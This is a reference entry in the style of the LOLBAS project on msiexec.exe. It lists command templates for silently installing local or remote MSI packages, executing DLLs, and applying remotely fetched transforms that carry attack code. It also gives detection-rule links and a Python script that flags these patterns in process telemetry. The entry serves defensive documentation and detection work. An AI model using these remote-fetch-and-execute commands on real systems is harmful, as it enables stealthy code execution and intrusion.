Msiexec.exe
Used by Windows to execute msi files
Paths
C:\Windows\System32\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
Commands
Execute
Installs the target .MSI file silently.
Use case: Execute a custom-made msi file containing attack code
Privileges: User
msiexec /quiet /i {PATH:.msi}
Execute
Installs the target remote (and possibly renamed) .MSI file silently.
Use case: Execute a custom-made msi file containing attack code, fetched from a remote server
Privileges: User
msiexec /q /i {REMOTEURL}
Execute
Calls DllRegisterServer to register the target DLL.
Use case: Execute dll files
Privileges: User
msiexec /y {PATH_ABSOLUTE:.dll}
Execute
Calls DllUnregisterServer to unregister the target DLL.
Use case: Execute dll files
Privileges: User
msiexec /z {PATH_ABSOLUTE:.dll}
Execute
Installs the target .MSI file, which may be a legitimate vendor-signed package. In addition to that file, a transform (.mst) file fetched from a remote URL is applied; the transform can contain malicious code or binaries. The /qb switch suppresses user input (basic UI only).
Use case: Install a trusted, signed msi file with additional attack code supplied as a transform file from a remote server
Privileges: User
msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
Detection
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml
- IOC: msiexec.exe retrieving files from Internet
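The patterns behind the detection links above (msiexec fetching from a URL, /y or /z with a DLL, a remote TRANSFORMS= value, and an msiexec.exe running from somewhere other than the two paths listed at the top of this page) can be checked directly against process-creation telemetry. The following is an added example, not part of the LOLBAS entry or any of the linked rules; the event format is a constructed (image, command line) pair such as one would extract from Sysmon Event ID 1 or Security 4688.

```python
import re
from typing import List, Tuple

# Expected on-disk locations from this page's "Paths" section (lowercased for comparison).
EXPECTED_PATHS = {
    r"c:\windows\system32\msiexec.exe",
    r"c:\windows\syswow64\msiexec.exe",
}

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# A switch is "/x" or "-x" preceded by whitespace/start, so "//" inside a URL does not match.
SWITCH_RE = re.compile(r"(?:^|\s)[/-]([a-z]+)", re.IGNORECASE)
REMOTE_TRANSFORM_RE = re.compile(r"transforms=[\"']?(?:https?|ftp)://", re.IGNORECASE)
SILENT_SWITCHES = {"q", "quiet", "qn", "qb"}


def classify_msiexec(image: str, cmdline: str) -> List[str]:
    """Return the list of suspicious traits for one msiexec process-creation event."""
    findings: List[str] = []
    if image.split("\\")[-1].lower() != "msiexec.exe":
        return findings                       # not msiexec at all; nothing to say
    if image.lower() not in EXPECTED_PATHS:
        findings.append("masquerading_path")  # msiexec.exe outside System32/SysWOW64
    switches = {s.lower() for s in SWITCH_RE.findall(cmdline)}
    if URL_RE.search(cmdline):
        findings.append("web_install")        # any argument is a URL: remote .msi or .mst
    if ({"y", "z"} & switches) and ".dll" in cmdline.lower():
        findings.append("dll_register")       # /y or /z: DllRegisterServer / DllUnregisterServer
    if REMOTE_TRANSFORM_RE.search(cmdline):
        findings.append("remote_transform")   # signed .msi plus a transform pulled from a URL
    if SILENT_SWITCHES & switches:
        findings.append("silent")             # /q, /quiet, /qn, /qb: no user interaction
    return findings


def scan_events(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify_msiexec over (image, cmdline) events and keep only the flagged ones."""
    flagged = []
    for image, cmdline in events:
        findings = classify_msiexec(image, cmdline)
        if findings:
            flagged.append((cmdline, findings))
    return flagged
```

Legitimate software distribution from internal HTTP shares will also produce web_install hits, so in production the URL check should be paired with an allowlist of known installer hosts rather than alerting on every match.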